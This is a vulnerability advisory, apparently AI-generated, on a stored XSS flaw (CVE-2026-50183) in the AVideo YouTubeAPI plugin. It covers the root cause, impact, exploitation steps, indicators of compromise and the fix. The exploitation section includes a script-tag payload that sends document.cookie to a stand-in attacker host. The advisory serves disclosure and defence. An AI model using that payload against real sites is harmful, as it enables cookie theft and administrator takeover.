CVE-2026-50183
PHP 脆弱性の分析と軽減

概要

CVE-2026-50183 is a stored Cross-Site Scripting (XSS) vulnerability in the AVideo YouTubeAPI plugin (WWBN/AVideo) that allows any YouTube video uploader to inject malicious JavaScript into the AVideo homepage gallery by setting a hostile video title. The vulnerability affects AVideo versions ≤ 29.0 and was published on May 28, 2026, with the GitHub Advisory Database entry updated on June 4, 2026. It carries a CVSS v3.1 base score of 4.7 (Moderate) (GitHub Advisory).

技術的な詳細

The root cause is CWE-79 (Stored XSS) chained with CWE-829 (Inclusion of Functionality from Untrusted Control Sphere): plugin/YouTubeAPI/YouTubeAPI.php::listVideos() fetches the snippet.title field from the YouTube Data API and stores it in a YPTvideoObject without sanitization, treating uploader-controlled content as trusted. plugin/YouTubeAPI/gallerySection.php then reflects the title into four HTML contexts in each gallery card — three with no encoding whatsoever, and one with only a partial str_replace('"', '', $youtubeTitle) mitigation that strips double quotes from a single attribute but leaves the other three sinks unprotected. The most dangerous sink (line 60) renders the title directly into the DOM as a live <script> element, causing synchronous JavaScript execution. AVideo's response caching (default cacheTimeout of 3600 seconds) means the malicious payload persists even after the hostile video title is changed or removed on YouTube (GitHub Advisory, AVideo Security Advisory).

影響

Every visitor who loads any AVideo page rendering the YouTubeAPI gallery section is affected: the injected JavaScript executes in the visitor's browser session under the AVideo origin, enabling theft of non-HttpOnly cookies and issuance of authenticated requests on behalf of the victim. When the victim is an AVideo administrator, the payload can perform any admin action available via cookie-based authentication — including creating users, escalating privileges, modifying configuration, or installing plugins — effectively enabling full administrative takeover of the AVideo instance. The payload's persistence through the cache window (up to one hour by default) means it continues to affect users even after the malicious YouTube video is removed (GitHub Advisory).

エクスプロイテーションのステップ

  1. Reconnaissance: Identify AVideo instances with the YouTubeAPI plugin enabled and showGallerySection=true (both are defaults after a YouTube Data API key is configured). Enumerate the operator's configured keyword/search query by observing the gallery content on the AVideo homepage.
  2. Create hostile YouTube video: Using any free YouTube account, upload a video and set its title to a JavaScript payload, e.g., <script>document.location='https://attacker.example/steal?c='+document.cookie</script>.
  3. Arrange query match: Ensure the hostile video appears in the AVideo operator's configured YouTube search results by including the operator's keyword phrase in the video's title, description, or by targeting a channel the operator follows.
  4. Wait for cache expiry: Wait up to 3600 seconds (default cacheTimeout) for AVideo's cached YouTube response to expire and a fresh listVideos() call to fetch the malicious title.
  5. Payload delivery: When any visitor (or administrator) loads the AVideo homepage or any page rendering the gallery section, the unencoded title is injected into the DOM as a live <script> element and executes synchronously in the victim's browser.
  6. Achieve objective: Collect stolen session cookies for account takeover, or — if the victim is an admin — issue authenticated admin API requests to create a backdoor account or install a malicious plugin (AVideo Security Advisory).

妥協の兆候

  • Network: Outbound requests from visitor browsers to unexpected external domains (e.g., attacker-controlled cookie-harvesting endpoints) originating from AVideo gallery page loads; unusual JavaScript-initiated POST requests to AVideo admin endpoints from non-admin user sessions.
  • Logs: AVideo web server access logs showing repeated requests to the homepage or gallery-rendering pages from diverse IPs shortly after a new YouTube video matching the configured query was indexed; YouTube Data API cache refresh events (listVideos() calls) coinciding with introduction of a new video with anomalous title characters (<, >, script).
  • File System: Unexpected new admin accounts or configuration changes in the AVideo database following gallery page loads; modified plugin files if an attacker leveraged admin takeover to install a malicious plugin.
  • Process/Application: AVideo cache files (stored for cacheTimeout seconds) containing raw HTML/JavaScript in the snippet.title field of cached YouTube API responses (AVideo Security Advisory).

軽減策と回避策

The fix was committed to the WWBN/AVideo repository (commit 7292129) and applies htmlspecialchars($video->title, ENT_QUOTES | ENT_HTML5, 'UTF-8') and equivalent encoding to the thumbnail URL before rendering in gallerySection.php, neutralizing all four injection sinks. As of the advisory publication, no patched release version was formally tagged (affected versions listed as ≤ 29.0 with "Patched versions: None" in the advisory), so operators should update to the latest master branch commit or apply the patch manually. As an interim workaround, disable the YouTubeAPI plugin or set showGallerySection=false in the plugin configuration, and manually flush the AVideo YouTube response cache to remove any already-cached malicious titles (AVideo Patch Commit, GitHub Advisory).

コミュニティの反応

The vulnerability was reported by security researcher arkmarta and published by AVideo maintainer DanielnetoDotCom via GitHub's coordinated disclosure process on May 28, 2026. No significant broader media coverage or notable social media commentary beyond the GitHub advisory and GitLab advisory mirror has been identified (GitHub Advisory).

関連情報


ソースこのレポートは AI を使用して生成されました

関連 PHP 脆弱 性:

CVE 識別子

重大度

スコア

テクノロジー

コンポーネント名

CISA KEV エクスプロイト

修正あり

公開日

CVE-2026-54458CRITICAL9.6
  • PHP logoPHP
  • wwbn/avideo
いいえいいえJul 15, 2026
CVE-2026-49279HIGH7.7
  • PHP logoPHP
  • wwbn/avideo
いいえいいえJul 15, 2026
GHSA-xg43-5579-qw6vMEDIUM6.5
  • PHP logoPHP
  • adawolfa/isdoc
いいえはいJul 15, 2026
CVE-2026-50182MEDIUM6.1
  • PHP logoPHP
  • wwbn/avideo
いいえいいえJul 15, 2026
CVE-2026-50183MEDIUM4.7
  • PHP logoPHP
  • wwbn/avideo
いいえいいえJul 15, 2026

無料の脆弱性評価

クラウドセキュリティポスチャーのベンチマーク

9つのセキュリティドメインにわたるクラウドセキュリティプラクティスを評価して、リスクレベルをベンチマークし、防御のギャップを特定します。

評価を依頼する

パーソナライズされたデモを見る

実際に Wiz を見てみませんか?​

"私が今まで見た中で最高のユーザーエクスペリエンスは、クラウドワークロードを完全に可視化します。"
デビッド・エストリックCISO (最高情報責任者)
"Wiz を使えば、クラウド環境で何が起こっているかを 1 つの画面で確認することができます"
アダム・フレッチャーチーフ・セキュリティ・オフィサー
"Wizが何かを重要視した場合、それは実際に重要であることを私たちは知っています。"
グレッグ・ポニャトフスキ脅威および脆弱性管理責任者